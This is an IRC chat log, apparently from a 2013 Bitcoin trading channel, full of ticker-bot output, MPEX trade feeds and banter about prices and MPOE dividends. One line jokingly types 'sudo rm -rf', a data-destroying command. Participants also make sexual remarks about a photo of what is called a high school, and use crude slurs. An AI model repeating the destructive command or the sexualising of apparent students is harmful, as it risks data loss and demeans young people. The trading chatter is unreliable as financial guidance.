[MPEX:S.MPOE] 1D: 0.00063298 / 0.00064538 / 0.00066013 (1651667 shares, 1,065.96 BTC), 7D: 0.000622 / 0.00064746 / 0.00068894 (10878160 shares, 7,043.22 BTC), 30D: 0.00060745 / 0.0006656 / 0.0007 (72247862 shares, 48,088.35 BTC) Feb 23 16:18:08 NEW LOW Feb 23 16:19:17 unless some retard sells under 27 we are good Feb 23 16:29:39 [MPEX] [S.MPOE] 4321 @ 0.00064708 = 2.796 BTC [-] Feb 23 16:29:41 [MPEX] [S.MPOE] 5971 @ 0.00064727 = 3.8648 BTC [+] Feb 23 16:34:39 [HAVELOCK] [SDICE] 1 @ 0.64 BTC [-] Feb 23 16:35:38 [HAVELOCK] [SDICE] 10 @ 0.632 = 6.32 BTC [-] Feb 23 16:37:06 also... the BFL bet should be paying me out soon. << indeed Feb 23 16:37:12 i remember inaba a month or so ago Feb 23 16:37:13 lol Feb 23 16:37:39 [HAVELOCK] [SDICE] 4 @ 0.63 = 2.52 BTC [-] Feb 23 16:38:00 lmao bugpowder is influencing the market. call the bec! Feb 23 16:45:37 since we are talking bullshit predictions Feb 23 16:45:38 heres mine Feb 23 16:45:39 http://shrani.si/f/36/x3/1yQoSMpP/critticall.png Feb 23 16:45:46 at least its done by something smarter than me Feb 23 16:50:00 Confirmed total: 3,003 BTC Feb 23 16:50:05 bitbet total over 3k! Feb 23 16:50:49 Gold Price - The spot gold price will trade below $1500 an ounce anytime during 2013 Feb 23 16:50:51 so far 1:1 Feb 23 16:53:35 ;;bc,stats Feb 23 16:53:38 Current Blocks: 222702 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1073 blocks | Next Difficulty In About: 6 days, 20 hours, 1 minute, and 31 seconds | Next Difficulty Estimate: 4282889.59309 | Estimated Percent Change: 17.30693 Feb 23 16:54:03 ;;ticker Feb 23 16:54:04 BTCUSD ticker | Best bid: 28.05014, Best ask: 28.09995, Bid-ask spread: 0.04981, Last trade: 28.05014, 24 hour volume: 77002.28715277, 24 hour low: 28.03100, 24 hour high: 31.30000, 24 hour vwap: 29.80096 Feb 23 16:54:33 damn i keep missing swimgs Feb 23 16:54:39 swings* Feb 23 16:57:07 ;;tslb Feb 23 16:57:14 you're right there.... you didn't sell prior? Feb 23 16:57:15 Time since last block: 10 minutes and 40 seconds Feb 23 16:57:53 [MPEX] [S.MPOE] 4321 @ 0.00063521 = 2.7447 BTC [-] Feb 23 16:57:55 [MPEX] [S.MPOE] 9065 @ 0.00063516 = 5.7577 BTC [-] Feb 23 17:00:03 anywho im gonna laugh my ass off if critticall comes close to what happens Feb 23 17:00:17 is it critTICall ? Feb 23 17:00:32 lol no Feb 23 17:02:11 [MPEX] [O.BTCUSD.P750T] 1000 @ 1.52897577 = 1528.9758 BTC Feb 23 17:02:33 wow... some heavy optioning... Feb 23 17:02:44 o hey, i like these new option values. Feb 23 17:03:13 hm would having options in sierra chart along mpex stocks make any sense Feb 23 17:03:32 i guess not much Feb 23 17:03:34 what could be useful would be some sort of merged options index Feb 23 17:03:39 if someone could manage to do it sanely. Feb 23 17:03:47 da what Feb 23 17:04:03 take all option vwaps and merge it into a single indicator. Feb 23 17:04:21 some sort of price prediction should be massage-able ouf ot that. Feb 23 17:04:28 vix Feb 23 17:04:30 lol Feb 23 17:04:45 something likwe that yea Feb 23 17:05:04 but i'd rather someone makes something new, as vix is both stupid and trademarked. Feb 23 17:05:19 nuh uh Feb 23 17:05:26 your stupid and trademarkes Feb 23 17:05:30 trademarked* Feb 23 17:05:34 i'm not trademarked, trilema is Feb 23 17:05:46 i have a trilemma Feb 23 17:05:57 in mah pants Feb 23 17:11:40 [MPEX] [O.BTCUSD.P750T] 845 @ 1.53153505 = 1294.1471 BTC [+] Feb 23 17:12:55 ;;ticker Feb 23 17:12:55 BTCUSD ticker | Best bid: 28.00000, Best ask: 28.02098, Bid-ask spread: 0.02098, Last trade: 28.00000, 24 hour volume: 77466.15415150, 24 hour low: 28.00000, 24 hour high: 31.30000, 24 hour vwap: 29.75109 Feb 23 17:14:00 o guise, i just realised Feb 23 17:14:20 if the rise keeps going for a coupla more weeks i'll be a nominal lei billionaire. Feb 23 17:14:42 there's like a dozen of those. Feb 23 17:15:03 gg Feb 23 17:15:59 ima buy myself a tv station or something Feb 23 17:16:13 o no, wait, it's been done. Feb 23 17:16:13 eh? Feb 23 17:16:34 that shit is dead Feb 23 17:16:40 28 is about to go Feb 23 17:17:01 kakobrekla yeah, true. Feb 23 17:17:03 ;;ticker Feb 23 17:17:08 BTCUSD ticker | Best bid: 28.00000, Best ask: 28.01099, Bid-ask spread: 0.01099, Last trade: 28.00000, 24 hour volume: 78910.12493557, 24 hour low: 28.00000, 24 hour high: 31.30000, 24 hour vwap: 29.71461 Feb 23 17:18:11 [MPEX] [S.MPOE] 3117 @ 0.00063516 = 1.9798 BTC [-] Feb 23 17:18:12 [MPEX] [S.MPOE] 4321 @ 0.00063472 = 2.7426 BTC [-] Feb 23 17:18:13 btce is down below 26.5 Feb 23 17:18:13 [MPEX] [S.MPOE] 7012 @ 0.00063471 = 4.4506 BTC [-] Feb 23 17:18:27 i know the perfect host for your tv station... bruce wagner Feb 23 17:19:41 ;;goxlag Feb 23 17:19:41 0 seconds Feb 23 17:20:18 i think his bf was about on the level of technical competence that's typical for local tv stations. Feb 23 17:20:22 the guy shooting in demo mode Feb 23 17:20:59 help mircea Feb 23 17:21:05 the dream is over Feb 23 17:21:25 bitstamp Feb 23 17:21:27 25.51 Feb 23 17:21:27 its turned into a 28$ nightmare Feb 23 17:23:05 [MPEX] [O.BTCUSD.P290T] 1000 @ 0.2699455 = 269.9455 BTC [+] Feb 23 17:23:44 lol what's so bad with 28 Feb 23 17:26:26 [MPEX] [S.MPOE] 4321 @ 0.00063473 = 2.7427 BTC [+] Feb 23 17:26:27 [MPEX] [S.MPOE] 3079 @ 0.00063471 = 1.9543 BTC [-] Feb 23 17:26:46 that sad, sad moment when i have to read the mpex faq to see dividend spec. Feb 23 17:29:41 bounce? Feb 23 17:32:52 pretty soon mpoe will have a full year of dividends! Feb 23 17:33:12 woohoo Feb 23 17:33:21 "The list of companies that have stopped selling firearms and ammunition to law enforcement agencies in states that are restricting the Second Amendment has grown to 42" Feb 23 17:33:25 this should be interesting Feb 23 17:33:36 the divide grows Feb 23 17:33:54 i bet it is fun to watch from the sidelines Feb 23 17:34:07 the deterioration of america Feb 23 17:34:30 jcpham it kinda is. Feb 23 17:35:17 it's funny to me how the original americans wanted to escape british colonialism and banking Feb 23 17:35:27 and then we did the exact same thing Feb 23 17:35:30 ;;ticker Feb 23 17:35:30 BTCUSD ticker | Best bid: 28.14000, Best ask: 28.16540, Bid-ask spread: 0.02540, Last trade: 28.14000, 24 hour volume: 79576.42946820, 24 hour low: 28.00000, 24 hour high: 31.30000, 24 hour vwap: 29.64794 Feb 23 17:35:31 learned nothing Feb 23 17:35:36 and religion Feb 23 17:35:41 and then took it to an all new extreme level Feb 23 17:36:05 jcpham ya well its how these things work. Feb 23 17:36:12 cycles Feb 23 17:36:18 all girls want to run away from home and become the oposite of their mother Feb 23 17:36:29 what they don't know is exactly how their mother ended up herself. Feb 23 17:36:52 temet nosce? Feb 23 17:37:28 no, it's gnothi seauton. Feb 23 17:38:44 It's all the same thing! Feb 23 17:38:45 :P Feb 23 17:40:25 :P Feb 23 17:40:38 hipster latin Feb 23 17:40:43 http://polimedia.us/dtng/c/src/136162355089.jpg ding ding, here comes the antifashion highschool Feb 23 17:41:35 most look pretty boneable there mircea Feb 23 17:42:28 they would be very boneable if someone either stripped them or dressed them. Feb 23 17:42:52 the course of being 18 Feb 23 17:42:55 curse* Feb 23 17:43:12 mircea_popescu: link? to the article on the firearms ? Feb 23 17:43:15 is that mpex headquarters? Feb 23 17:43:19 male to female ratio in that photo is amazing Feb 23 17:43:37 mircea you pimp Feb 23 17:43:40 jcpham very strong gender separation in romania Feb 23 17:43:52 most boys do like tech stuff, most gurls psycology or w/e Feb 23 17:44:04 old soviet guy's an engineer girl's a teacher stuff. Feb 23 17:44:07 Ukto one sec Feb 23 17:44:29 http://www.theblaze.com/stories/2013/02/23/gaining-momentum-now-42-gun-companies-have-stopped-selling-to-law-enforcement-in-anti-2nd-amendment-states/ Feb 23 17:44:40 thanks Feb 23 17:44:54 BitHub if you can't see cunny it can't be my hq. Feb 23 17:45:06 and women in pants ?! wtf is this. Feb 23 17:45:11 cunny = mingy? Feb 23 17:45:37 mingy ?! that sounds like mange Feb 23 17:45:54 we're talking about clams here right? Feb 23 17:45:58 yeah tuna. Feb 23 17:46:09 ahh okey, the ol sushi roll Feb 23 17:46:54 is cunny slang for see you next tuesday? Feb 23 17:47:07 no, it's diminutive cunt. Feb 23 17:47:17 ;) Feb 23 17:47:51 where's your pr girl? :P Feb 23 17:48:11 i dunno Feb 23 17:48:50 her, "so you think you're going to start a bitcoin business" thing was good, i read it a few months ago Feb 23 17:49:25 she's done a few decent pieces Feb 23 17:51:44 anonymous PR Feb 23 17:51:48 :P Feb 23 17:55:07 ;;ticker Feb 23 17:55:07 BTCUSD ticker | Best bid: 28.37039, Best ask: 28.39949, Bid-ask spread: 0.02910, Last trade: 28.39999, 24 hour volume: 80010.85487400, 24 hour low: 28.00000, 24 hour high: 31.30000, 24 hour vwap: 29.57922 Feb 23 17:55:19 ;;asks 30 Feb 23 17:55:20 There are currently 2949.6143 bitcoins offered at or under 30.0 USD, worth 86428.9204458 USD in total. Feb 23 17:55:25 mircea_popescu: The boycott you mentioned is a cheap protest. Not one of those vendors was a major supplier for any police agency to begin with. Feb 23 17:55:34 ;;bids 27 Feb 23 17:55:36 There are currently 11222.97 bitcoins demanded at or over 27.0 USD, worth 308581.534498 USD in total. Feb 23 17:55:43 ;;bids 28 Feb 23 17:55:45 There are currently 4015.1111 bitcoins demanded at or over 28.0 USD, worth 112516.0971 USD in total. Feb 23 18:13:06 asciilifeform i have no idea. Feb 23 18:13:10 link or something ? Feb 23 18:13:54 (not that i'd expect anyone on the list is actually foregoing lucrative public contracts for the sake of principles or w/e) Feb 23 18:17:46 seen this? Feb 23 18:17:47 http://www.debuggex.com/?re=&str= Feb 23 18:20:26 o hey, that should be useful Feb 23 18:21:02 yeah thanks Feb 23 18:21:42 [BTCTC] [BTC-BOND] 378 @ 0.01 = 3.78 BTC [+] Feb 23 18:28:21 fucin bounce Feb 23 18:28:23 dam Feb 23 18:28:37 ;;ticker Feb 23 18:28:38 BTCUSD ticker | Best bid: 28.15200, Best ask: 28.30998, Bid-ask spread: 0.15798, Last trade: 28.30998, 24 hour volume: 80339.52109371, 24 hour low: 28.00000, 24 hour high: 31.30000, 24 hour vwap: 29.52515 Feb 23 18:28:45 is gonna happen Feb 23 18:28:53 asks thinnning Feb 23 18:29:15 I hate the investment strategy that requires everyone to panic Feb 23 18:33:08 [MPEX] [S.MPOE] 509 @ 0.00063471 = 0.3231 BTC [-] Feb 23 18:33:10 [MPEX] [S.MPOE] 4191 @ 0.00063471 = 2.6601 BTC [-] Feb 23 18:33:37 LOL Feb 23 18:33:42 I hate the investment strategy that requires everyone to panic Feb 23 18:33:44 I LOVE IT Feb 23 18:33:54 That's the perfect sentiment for how bitcoin investors operate Feb 23 18:34:04 the only market that panic buys Feb 23 18:34:17 ;;ticker Feb 23 18:34:18 BTCUSD ticker | Best bid: 28.16751, Best ask: 28.29999, Bid-ask spread: 0.13248, Last trade: 28.16751, 24 hour volume: 80116.02261659, 24 hour low: 28.00000, 24 hour high: 31.30000, 24 hour vwap: 29.51952 Feb 23 18:47:50 mircea_popescu: The two possibly largest suppliers of small arms to U.S. agencies - Colt and Glock - are nowhere to be found on the list. To no one's surprise. Feb 23 18:49:28 asciilifeform us agencies = federal Feb 23 18:49:30 this'd be state. Feb 23 18:53:09 [MPEX] [S.MPOE] 4321 @ 0.00063832 = 2.7582 BTC [+] Feb 23 18:53:14 [MPEX] [S.MPOE] 1279 @ 0.00063853 = 0.8167 BTC [+] Feb 23 18:53:38 [HAVELOCK] [SDICE] 10 @ 0.622 = 6.22 BTC [-] Feb 23 18:53:40 [HAVELOCK] [SDICE] 10 @ 0.621 = 6.21 BTC [-] Feb 23 18:53:41 [HAVELOCK] [SDICE] 2 @ 0.62 = 1.24 BTC [-] Feb 23 18:54:51 mircea_popescu: I meant both, of course. Feb 23 18:55:32 mircea_popescu: Glock alone has >50% market share among U.S. police of all kinds. Feb 23 18:56:10 aha Feb 23 18:56:38 [MPEX] [S.MPOE] 4321 @ 0.00063626 = 2.7493 BTC [-] Feb 23 18:56:40 [MPEX] [S.MPOE] 8100 @ 0.00063619 = 5.1531 BTC [-] Feb 23 18:56:45 [MPEX] [S.MPOE] 890 @ 0.00063471 = 0.5649 BTC [-] Feb 23 18:56:51 [MPEX] [S.MPOE] 4039 @ 0.00063444 = 2.5625 BTC [-] Feb 23 18:56:54 ;;ticker Feb 23 18:56:55 BTCUSD ticker | Best bid: 28.24443, Best ask: 28.43465, Bid-ask spread: 0.19022, Last trade: 28.24442, 24 hour volume: 80579.39466103, 24 hour low: 28.00000, 24 hour high: 31.30000, 24 hour vwap: 29.48633 Feb 23 18:59:41 [MPEX] [S.MPOE] 684 @ 0.00063444 = 0.434 BTC [-] Feb 23 18:59:42 [MPEX] [S.MPOE] 4039 @ 0.00063428 = 2.5619 BTC [-] Feb 23 18:59:56 [MPEX] [S.MPOE] 1677 @ 0.00063374 = 1.0628 BTC [-] Feb 23 19:02:10 ;;ticker Feb 23 19:02:11 BTCUSD ticker | Best bid: 28.43464, Best ask: 28.43465, Bid-ask spread: 0.00001, Last trade: 28.43464, 24 hour volume: 79869.13925499, 24 hour low: 28.00000, 24 hour high: 31.30000, 24 hour vwap: 29.46619 Feb 23 19:03:39 [HAVELOCK] [SDICE] 1 @ 0.619 BTC [-] Feb 23 19:15:01 askwall Feb 23 19:16:53 [MPEX] [S.DICE] 1350 @ 0.00590803 = 7.9758 BTC [-] Feb 23 19:16:55 [MPEX] [S.DICE] 528 @ 0.00593273 = 3.1325 BTC [+] Feb 23 19:16:55 [MPEX] [S.DICE] 100 @ 0.0060899 = 0.609 BTC [+] Feb 23 19:16:57 [MPEX] [S.DICE] 68022 @ 0.00609 = 414.254 BTC [+] Feb 23 19:17:29 [MPEX] [S.MPOE] 4321 @ 0.0006382 = 2.7577 BTC [+] Feb 23 19:17:31 [MPEX] [S.MPOE] 11379 @ 0.00063853 = 7.2658 BTC [+] Feb 23 19:22:59 [MPEX] [S.MPOE] 3273 @ 0.00063396 = 2.075 BTC [-] Feb 23 19:25:34 mircea_popescu: what was the per share payout of mpoe ? Feb 23 19:26:04 ;;calc 489.9/500000000 Feb 23 19:26:04 9.798e-07 Feb 23 19:26:14 98 satoshi per share! Feb 23 19:28:22 correct me if I AM WRONG.. 98 - 5% = 93.1 Feb 23 19:28:34 stupid caps Feb 23 19:28:52 close enuf Feb 23 19:28:57 i mean Feb 23 19:29:01 can't do .1 satoshi Feb 23 19:29:12 ;;calc 465.405/500000000 Feb 23 19:29:12 9.3081e-07 Feb 23 19:29:32 even .1 is high Feb 23 19:33:51 :( Feb 23 19:33:57 ask wall eaten Feb 23 19:34:34 like 98 ya Feb 23 19:35:33 i msut admit.. the div payout seems awfully low compared to the share trading price Feb 23 19:36:01 disasterrrrr Feb 23 19:44:56 sigh Feb 23 19:51:11 [MPEX] [S.MPOE] 9150 @ 0.00063843 = 5.8416 BTC [+] Feb 23 19:53:40 [MPEX] [S.MPOE] 7400 @ 0.00063843 = 4.7244 BTC [+] Feb 23 19:58:20 eh is ok. Feb 23 19:58:28 above 27 is ok Feb 23 19:58:52 thats the old resistance Feb 23 19:58:59 [MPEX] [S.MPOE] 1450 @ 0.00063843 = 0.9257 BTC [+] Feb 23 19:59:00 [MPEX] [S.MPOE] 1048 @ 0.00063375 = 0.6642 BTC [-] Feb 23 19:59:02 [MPEX] [S.MPOE] 8973 @ 0.00063374 = 5.6865 BTC [-] Feb 23 19:59:03 [MPEX] [S.MPOE] 1029 @ 0.0006331 = 0.6515 BTC [-] Feb 23 20:02:21 kakobrekla: up is a disaster. down is bliss Feb 23 20:02:45 flip your screen vertically Feb 23 20:02:52 asks disappearing Feb 23 20:02:55 fuck Feb 23 20:03:29 its bullish Feb 23 20:03:33 if you havent noticed Feb 23 20:03:36 :) Feb 23 20:04:50 I know Feb 23 20:04:52 i know Feb 23 20:05:22 need another dump by 3AM UTC Feb 23 20:06:54 i think we are seeing different mentalitly people comming in Feb 23 20:07:00 more mature Feb 23 20:07:19 sheep will lose their coins sooner or later Feb 23 20:07:42 more mature? Feb 23 20:07:45 reddit is coming in Feb 23 20:07:50 the discourse is not mature Feb 23 20:08:01 reddit and their 18$ bucks Feb 23 20:08:16 has nothing to do with it Feb 23 20:08:19 the coinbase crew is coming in Feb 23 20:08:22 [MPEX] [S.DICE] 448 @ 0.00609 = 2.7283 BTC [+] Feb 23 20:08:37 i wrote dollars twice Feb 23 20:08:40 what an idiot. Feb 23 20:08:50 dollar bucks. Feb 23 20:12:36 ;;ticker Feb 23 20:12:37 BTCUSD ticker | Best bid: 29.15001, Best ask: 29.26900, Bid-ask spread: 0.11899, Last trade: 29.10100, 24 hour volume: 82416.42897067, 24 hour low: 28.00000, 24 hour high: 31.24800, 24 hour vwap: 29.38030 Feb 23 20:12:45 back up lol Feb 23 20:13:00 not for long Feb 23 20:13:06 supercrash Feb 23 20:13:06 sell now! Feb 23 20:13:08 is coming! Feb 23 20:13:18 I supercrash really coming or are you Feb 23 20:13:20 just saying that? Feb 23 20:13:37 how should I know? Feb 23 20:13:57 you're a neuroscientist Feb 23 20:14:01 you know everything Feb 23 20:16:20 I know nothing Feb 23 20:16:24 I am terrible at this Feb 23 20:16:35 Socratic words my friend. Feb 23 20:16:44 that means you are truly the smartest here! Feb 23 20:18:02 not in finance Feb 23 20:18:25 MP definitely has me beat in finance, and some other people here probably do too Feb 23 20:34:11 [MPEX] [S.MPOE] 1647 @ 0.0006331 = 1.0427 BTC [-] Feb 23 20:35:24 ;;ticker Feb 23 20:35:25 BTCUSD ticker | Best bid: 29.21001, Best ask: 29.27993, Bid-ask spread: 0.06992, Last trade: 29.27995, 24 hour volume: 82034.99855450, 24 hour low: 28.00000, 24 hour high: 31.24800, 24 hour vwap: 29.36607 Feb 23 20:35:29 omg it crashed to 29!!1 Feb 23 20:35:46 it crashed to 28.... Feb 23 20:35:52 now it's goin back up Feb 23 20:36:03 im just messing with bugpowda Feb 23 20:36:16 and cream chowda Feb 23 20:36:19 let em holla Feb 23 20:36:47 don't discourage your customers Feb 23 20:36:59 [MPEX] [S.MPOE] 1824 @ 0.0006331 = 1.1548 BTC [-] Feb 23 20:37:01 [MPEX] [S.MPOE] 8176 @ 0.00063292 = 5.1748 BTC [-] Feb 23 20:40:34 I hope MPOE crashes this spring and that better gets a ton of money Feb 23 20:40:39 not really that's mean Feb 23 20:49:20 [MPEX] [S.MPOE] 942 @ 0.00063853 = 0.6015 BTC [+] Feb 23 20:49:22 [MPEX] [S.MPOE] 4321 @ 0.00063953 = 2.7634 BTC [+] Feb 23 20:49:24 [MPEX] [S.MPOE] 337 @ 0.00063953 = 0.2155 BTC [+] Feb 23 20:58:05 [MPEX] [S.MPOE] 4321 @ 0.00063926 = 2.7622 BTC [-] Feb 23 20:58:07 [MPEX] [S.MPOE] 1579 @ 0.00063953 = 1.0098 BTC [+] Feb 23 20:59:02 [BTCTC] [BITVPS] 50 @ 0.00429 = 0.2145 BTC [-] Feb 23 21:04:10 [BTCTC] [BTC-MINING] 1 @ 0.43999 BTC [+] Feb 23 21:06:47 [MPEX] [S.MPOE] 4321 @ 0.00063456 = 2.7419 BTC [-] Feb 23 21:06:48 [MPEX] [S.MPOE] 3673 @ 0.00063432 = 2.3299 BTC [-] Feb 23 21:07:04 [MPEX] [S.MPOE] 4321 @ 0.00063453 = 2.7418 BTC [+] Feb 23 21:07:06 [MPEX] [S.MPOE] 4321 @ 0.00063432 = 2.7409 BTC [-] Feb 23 21:07:07 [MPEX] [S.MPOE] 2908 @ 0.00063431 = 1.8446 BTC [-] Feb 23 21:07:13 [MPEX] [S.DICE] 381 @ 0.00595585 = 2.2692 BTC [-] Feb 23 21:07:43 [MPEX] [S.DICE] 1187 @ 0.00595585 = 7.0696 BTC [-] Feb 23 21:11:01 [MPEX] [S.MPOE] 15600 @ 0.00063431 = 9.8952 BTC [-] Feb 23 21:18:35 [MPEX] [S.DICE] 381 @ 0.00596 = 2.2708 BTC [+] Feb 23 21:25:06 [MPEX] [S.MPOE] 6300 @ 0.00063431 = 3.9962 BTC [-] Feb 23 21:29:02 time to go back down Feb 23 21:30:15 [MPEX] [S.MPOE] 4321 @ 0.00063925 = 2.7622 BTC [+] Feb 23 21:30:17 [MPEX] [S.MPOE] 11135 @ 0.00063953 = 7.1212 BTC [+] Feb 23 21:38:01 [BTCTC] [SYNERGY] 1 @ 0.08826 BTC [+] Feb 23 21:40:59 [BTCTC] [BTC-TRADING-PT] 1 @ 0.091 BTC [+] Feb 23 21:41:05 [MPEX] [S.MPOE] 4321 @ 0.0006394 = 2.7628 BTC [-] Feb 23 21:41:06 [MPEX] [S.MPOE] 2949 @ 0.00063953 = 1.886 BTC [+] Feb 23 21:41:08 [MPEX] [S.MPOE] 5980 @ 0.00063954 = 3.8244 BTC [+] Feb 23 21:41:34 ;;ticker Feb 23 21:41:34 BTCUSD ticker | Best bid: 28.78395, Best ask: 28.80000, Bid-ask spread: 0.01605, Last trade: 28.80000, 24 hour volume: 81783.91072610, 24 hour low: 28.00000, 24 hour high: 31.24800, 24 hour vwap: 29.32910 Feb 23 21:46:36 [MPEX] [S.MPOE] 4321 @ 0.00063951 = 2.7633 BTC [-] Feb 23 21:46:37 [MPEX] [S.MPOE] 10479 @ 0.00063954 = 6.7017 BTC [+] Feb 23 21:48:51 [MPEX] [S.MPOE] 14650 @ 0.00063954 = 9.3693 BTC [+] Feb 23 21:56:41 [MPEX] [S.MPOE] 2542 @ 0.00063431 = 1.6124 BTC [-] Feb 23 21:56:42 [MPEX] [S.MPOE] 4321 @ 0.00063293 = 2.7349 BTC [-] Feb 23 21:56:43 [MPEX] [S.MPOE] 1287 @ 0.00063292 = 0.8146 BTC [-] Feb 23 21:58:52 [MPEX] [S.MPOE] 4321 @ 0.00063315 = 2.7358 BTC [+] Feb 23 21:58:54 [MPEX] [S.MPOE] 6537 @ 0.00063292 = 4.1374 BTC [-] Feb 23 21:58:55 [MPEX] [S.MPOE] 12342 @ 0.00063291 = 7.8114 BTC [-] Feb 23 22:29:38 [MPEX] [S.MPOE] 5708 @ 0.00063291 = 3.6127 BTC [-] Feb 23 22:29:40 [MPEX] [S.MPOE] 4321 @ 0.00063269 = 2.7339 BTC [-] Feb 23 22:29:41 [MPEX] [S.MPOE] 16000 @ 0.00063268 = 10.1229 BTC [-] Feb 23 22:29:43 [MPEX] [S.MPOE] 9221 @ 0.00063266 = 5.8338 BTC [-] Feb 23 22:37:39 [MPEX] [S.MPOE] 12100 @ 0.0006356 = 7.6908 BTC [+] Feb 23 22:37:41 [MPEX] [S.MPOE] 1250 @ 0.00063266 = 0.7908 BTC [-] Feb 23 22:40:25 [MPEX] [S.MPOE] 4321 @ 0.00063664 = 2.7509 BTC [+] Feb 23 22:40:27 [MPEX] [S.MPOE] 8929 @ 0.00063683 = 5.6863 BTC [+] Feb 23 22:44:22 [MPEX] [S.MPOE] 2409 @ 0.00063266 = 1.5241 BTC [-] Feb 23 22:44:24 [MPEX] [S.MPOE] 2750 @ 0.00063069 = 1.7344 BTC [-] Feb 23 22:44:30 [MPEX] [S.MPOE] 4321 @ 0.00063058 = 2.7247 BTC [-] Feb 23 22:44:32 [MPEX] [S.MPOE] 2263 @ 0.00063057 = 1.427 BTC [-] Feb 23 22:48:29 [MPEX] [S.MPOE] 2799 @ 0.00063037 = 1.7644 BTC [-] Feb 23 22:48:30 [MPEX] [S.MPOE] 15208 @ 0.00063036 = 9.5865 BTC [-] Feb 23 22:50:38 [MPEX] [S.MPOE] 4792 @ 0.00063036 = 3.0207 BTC [-] Feb 23 22:50:45 [MPEX] [S.MPOE] 3686 @ 0.00062981 = 2.3215 BTC [-] Feb 23 22:54:07 [BTCTC] [S.DICE-PT] 3 @ 0.00625 = 0.0188 BTC [+] Feb 23 23:02:40 hello Feb 23 23:03:21 both main and backup data collection for live.coinbr failed and i was not around to fix Feb 23 23:03:40 so i'll prolly have to scrap assbot output... what a day Feb 23 23:04:16 how do they both fail ?! Feb 23 23:04:44 rebooted the backup machine and it did not start Feb 23 23:05:02 ouch. Feb 23 23:05:25 and the main one just couldn't time out failed connections properly Feb 23 23:05:31 it just hangs.. argh Feb 23 23:06:15 graph baldspot! Feb 23 23:06:44 it underwent depilation Feb 23 23:08:11 [MPEX] [S.MPOE] 4150 @ 0.0006305 = 2.6166 BTC [+] Feb 23 23:10:28 [02:59:30] jurov float = all shares! <<< and dividend IS reported only for "outstanding shares", not all shares Feb 23 23:10:40 S.MPOE paid a total dividend of 489.94443185 BTC to 500`000`000 outstanding shares. Feb 23 23:11:08 a that's what you meant Feb 23 23:11:19 but as namworld used the number for all shares, he got correct outcome Feb 23 23:11:32 i gotta sort this out somehow so people stop thinking the 50% owned by owner is not part of the float. Feb 23 23:11:38 i have no idea why they even think that. Feb 23 23:12:09 i have it meticulously documented here and always consult it when forwarding divs Feb 23 23:12:28 I think its because it is not listed anywhere on the asset page Feb 23 23:12:49 (a)Mircea Popescu has elected to divide MPOE/MPEx into 1`000`000`000 (one billion) equal non-voting shares. Feb 23 23:12:51 like that ? Feb 23 23:12:57 yeah Feb 23 23:13:06 and then the dividend pays out to 500,000,000 Feb 23 23:13:12 which is not indicated Feb 23 23:14:01 people need an easy way to cross reference the dividend number with the total # of shares it was paid to Feb 23 23:14:09 I didn't get it until I asked Feb 23 23:14:15 yeah Feb 23 23:17:47 [MPEX] [S.MPOE] 6900 @ 0.00062981 = 4.3457 BTC [-] Feb 23 23:24:38 [HAVELOCK] [SDICE] 2 @ 0.62 = 1.24 BTC [+] Feb 23 23:27:58 [MPEX] [S.MPOE] 505 @ 0.00062981 = 0.3181 BTC [-] Feb 23 23:28:00 [MPEX] [S.MPOE] 6424 @ 0.00062869 = 4.0387 BTC [-] Feb 23 23:28:12 [MPEX] [S.MPOE] 2180 @ 0.00062862 = 1.3704 BTC [-] Feb 23 23:34:17 ls Feb 23 23:34:21 cd ../ Feb 23 23:34:29 sudo rm -rf Feb 23 23:36:58 [MPEX] [S.MPOE] 4370 @ 0.00062862 = 2.7471 BTC [-] Feb 23 23:37:00 [MPEX] [S.MPOE] 6630 @ 0.00062859 = 4.1676 BTC [-] Feb 23 23:39:01 Bugpowder http://mpex.co/?mpsic=S.MPOE how about now ? Feb 23 23:41:10 excellent Feb 23 23:41:24 ;;calc 520 * 12 Feb 23 23:41:25 6240 Feb 23 23:42:28 diiiiiiiiiice Feb 23 23:43:41 [MPEX] [S.MPOE] 5350 @ 0.00062859 = 3.363 BTC [-] Feb 23 23:44:38 !ticker m S.DICE Feb 23 23:44:38 [MPEX:S.DICE] 1D: 0.00572194 / 0.00606379 / 0.00609 (78687 shares, 477.14 BTC), 7D: 0.00562811 / 0.006341 / 0.0069 (1385823 shares, 8,787.51 BTC), 30D: 0.0042 / 0.00610597 / 0.0075 (7129155 shares, 43,530.42 BTC) Feb 23 23:45:24 [MPEX] [S.DICE] 546 @ 0.0060566 = 3.3069 BTC [+] Feb 23 23:45:26 [MPEX] [S.DICE] 2000 @ 0.00609796 = 12.1959 BTC [+] Feb 23 23:45:27 [MPEX] [S.DICE] 1350 @ 0.0061902 = 8.3568 BTC [+] Feb 23 23:45:56 cool! Feb 23 23:51:38 [HAVELOCK] [SDICE] 1 @ 0.6 BTC [-] Feb 23 23:53:36 :%s/^\[\([^]]*\)\] \+\[\([^]]*\)\] \+\[MPEX\] \+\[\([^]]*\)\] \([0-9]\+\) @ \([0-9.]\+\).*$/ ('\1 \2+01', '\3', \4, \5*100000000),/ Feb 23 23:53:53 live.coinbr. replenished (using above monstrosity) Feb 23 23:54:14 O_o Feb 23 23:54:21 [BTCTC] [BITVPS] 1 @ 0.00341 BTC [-] Feb 23 23:56:02 "Backreferences are not (yet) supported" Feb 23 23:56:03 FAIL Feb 23 23:56:16 use vim Feb 23 23:56:22 no i wanted to test that siter Feb 23 23:56:35 http://www.debuggex.com/ Feb 23 23:57:10 ;;ticker Feb 23 23:57:10 anyway, i propose that regex as the new nick of imsaguy Feb 23 23:57:11 BTCUSD ticker | Best bid: 29.60000, Best ask: 29.63679, Bid-ask spread: 0.03679, Last trade: 29.78900, 24 hour volume: 73211.72072907, 24 hour low: 28.00000, 24 hour high: 30.84990, 24 hour vwap: 29.10116 Feb 23 23:57:24 someone is buying or clarkmoodys fucked Feb 23 23:57:41 we're crashing upwards. Feb 23 23:57:48 AGAIN! Feb 24 00:00:30 this is going nicley Feb 24 00:00:30 https://bitcointalk.org/index.php?topic=146319.0 Feb 24 00:00:32 heh Feb 24 00:02:50 [MPEX] [S.DICE] 270 @ 0.00638996 = 1.7253 BTC [+] Feb 24 00:04:31 fuc dis Feb 24 00:05:01 dont be mad Feb 24 00:05:02 ;;ticker Feb 24 00:05:03 BTCUSD ticker | Best bid: 29.80000, Best ask: 29.95000, Bid-ask spread: 0.15000, Last trade: 29.95000, 24 hour volume: 73970.87061214, 24 hour low: 28.00000, 24 hour high: 30.83916, 24 hour vwap: 29.10751 Feb 24 00:05:36 hey mp Feb 24 00:05:37 if you wanna trade you will always have drawdown Feb 24 00:05:54 how does bitbet make money??? apart from that 1% fee and the advertising income? Feb 24 00:06:05 we print it Feb 24 00:06:13 duh, but how else Feb 24 